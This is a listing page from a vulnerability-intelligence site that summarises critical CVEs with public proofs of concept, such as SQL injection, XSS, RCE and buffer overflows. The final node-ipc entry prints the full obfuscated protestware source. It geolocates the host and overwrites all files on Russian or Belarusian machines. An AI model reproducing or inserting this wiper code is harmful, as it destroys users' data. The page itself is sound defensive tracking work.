Critical Vulnerabilities with Public Exploits
Updated 2h agoSearch and track vulnerabilities with real-time exploit intelligence. Cross-reference CVEs against public exploits from ExploitDB, Metasploit, GitHub, and Nuclei — with CVSS and EPSS scoring, CISA KEV monitoring, and AI-powered exploit analysis.
4,109 results
Clear all
CVE-2022-25315
9.8
CRITICAL
SSVC PoC
1 PoC
Analysis
EPSS 0.08
Libexpat < 2.4.5 - Integer Overflow
In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames.
CWE-190
Feb 18, 2022
CVE-2022-50912
9.8
CRITICAL
SSVC PoC
1 PoC
Analysis
EPSS 0.00
ImpressCMS 1.4.4 - Code Injection
ImpressCMS 1.4.4 contains a file upload vulnerability with weak extension sanitization that allows attackers to upload potentially malicious files. Attackers can bypass file upload restrictions by using alternative file extensions .php2.php6.php7.phps.pht to execute arbitrary PHP code on the server.
CWE-434
Jan 13, 2026
CVE-2022-50910
9.8
CRITICAL
SSVC PoC
1 PoC
Analysis
EPSS 0.00
Beehive Forum 1.5.2 - Host Header Injection
Beehive Forum 1.5.2 contains a host header injection vulnerability in the forgot password functionality that allows attackers to manipulate password reset requests. Attackers can inject a malicious host header to intercept password reset tokens and change victim account passwords without direct authentication.
CWE-640
Jan 13, 2026
CVE-2022-50905
9.8
CRITICAL
SSVC PoC
1 PoC
Analysis
EPSS 0.00
e107 CMS 3.2.1 - XSS
e107 CMS version 3.2.1 contains multiple vulnerabilities that allow cross-site scripting (XSS) attacks. The first vulnerability is a reflected XSS that occurs in the news comment functionality when authenticated users interact with the comment form. An attacker can inject malicious JavaScript code through the URL parameter that gets executed when users click outside the comment field after typing content. The second vulnerability involves an upload restriction bypass for authenticated administrators, allowing them to upload SVG files containing malicious code through the media manager's remote URL upload feature. This results in stored XSS when the uploaded SVG files are accessed. These vulnerabilities were discovered by Hubert Wojciechowski and affect the news.php and image.php components of the CMS.
CWE-79
Jan 13, 2026
CVE-2022-27412
9.8
CRITICAL
1 PoC
Analysis
EPSS 0.01
Exploreit Explore Cms - SQL Injection
Explore CMS v1.0 was discovered to contain a SQL injection vulnerability via a /page.php?id= request.
CWE-89
May 09, 2022
CVE-2022-30292
10.0
CRITICAL
1 PoC
Analysis
EPSS 0.02
Squirrel - Out-of-Bounds Write
Heap-based buffer overflow in sqbaselib.cpp in SQUIRREL 3.2 due to lack of a certain sq_reservestack call.
CWE-787
May 04, 2022
CVE-2022-25089
9.8
CRITICAL
2 PoCs
Analysis
EPSS 0.43
Kofax Printix < 1.3.1106.0 - Improper Privilege Management
Printix Secure Cloud Print Management through 1.3.1106.0 incorrectly uses Privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData.
CWE-269
Mar 03, 2022
CVE-2022-23852
9.8
CRITICAL
1 PoC
Analysis
EPSS 0.02
Expat <2.4.4 - Buffer Overflow
Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES.
CWE-190
Jan 24, 2022
CVE-2022-27434
9.8
CRITICAL
1 PoC
Analysis
EPSS 0.02
Unit4 Teta < 29.5 - SQL Injection
UNIT4 TETA Mobile Edition (ME) before 29.5.HF17 was discovered to contain a SQL injection vulnerability via the ProfileName parameter in the errorReporting page.
CWE-89
Jul 18, 2022
CVE-2022-25236
9.8
CRITICAL
1 PoC
Analysis
EPSS 0.07
Libexpat < 2.4.5 - Exposure to Wrong Actor
xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs.
CWE-668
Feb 16, 2022
CVE-2022-29465
9.8
CRITICAL
SSVC PoC
1 PoC
Analysis
EPSS 0.11
Accusoft Imagegear - Out-of-Bounds Write
An out-of-bounds write vulnerability exists in the PSD Header processing memory allocation functionality of Accusoft ImageGear 20.0. A specially-crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.
CWE-119
Aug 05, 2022
CVE-2022-24449
9.8
CRITICAL
1 PoC
Analysis
EPSS 0.01
Solar appScreener <3.10.4 - XSS
Solar appScreener through 3.10.4, when a valid license is not present, allows XXE and SSRF attacks via a crafted XML document.
CWE-611
Apr 28, 2022
CVE-2022-0265
9.8
CRITICAL
1 PoC
Analysis
EPSS 0.08
GitHub hazelcast/hazelcast <5.1-BETA-1 - SSRF
Improper Restriction of XML External Entity Reference in GitHub repository hazelcast/hazelcast in 5.1-BETA-1.
CWE-611
Mar 03, 2022
CVE-2022-29013
9.8
CRITICAL
EXPLOITED
1 PoC
Analysis
NUCLEI
EPSS 0.93
Razer Sila Gaming Router <v2.0.441_api-2.0.418 - Command Injection
A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.
CWE-78
Jun 09, 2022
CVE-2022-24702
9.8
CRITICAL
SSVC PoC
1 PoC
Analysis
EPSS 0.40
WinAPRS 2.9.0 - RCE
An issue was discovered in WinAPRS 2.9.0. A buffer overflow in the VHF KISS TNC component allows a remote attacker to achieve remote code execution via malicious AX.25 packets over the air. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
CWE-120
Jun 02, 2022
CVE-2022-24760
10.0
CRITICAL
SSVC PoC
1 PoC
Analysis
EPSS 0.76
Parse Server <4.10.7 - RCE
Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm.
CWE-74
Mar 12, 2022
CVE-2022-27927
9.8
CRITICAL
1 PoC
Analysis
NUCLEI
EPSS 0.74
Microfinance Management System - SQL Injection
A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter.
CWE-89
Apr 19, 2022
CVE-2022-28118
9.8
CRITICAL
1 PoC
Analysis
EPSS 0.04
SiteServer CMS v7.x - RCE
SiteServer CMS v7.x allows attackers to execute arbitrary code via a crafted plug-in.
May 03, 2022
CVE-2022-27413
9.8
CRITICAL
1 PoC
Analysis
EPSS 0.12
Hospital Management System - SQL Injection
Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php.
CWE-89
May 03, 2022
CVE-2022-23812
9.8
CRITICAL
EXPLOITED
1 PoC
Analysis
EPSS 0.09
node-ipc <10.1.3 - Code Injection
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
Mar 16, 2022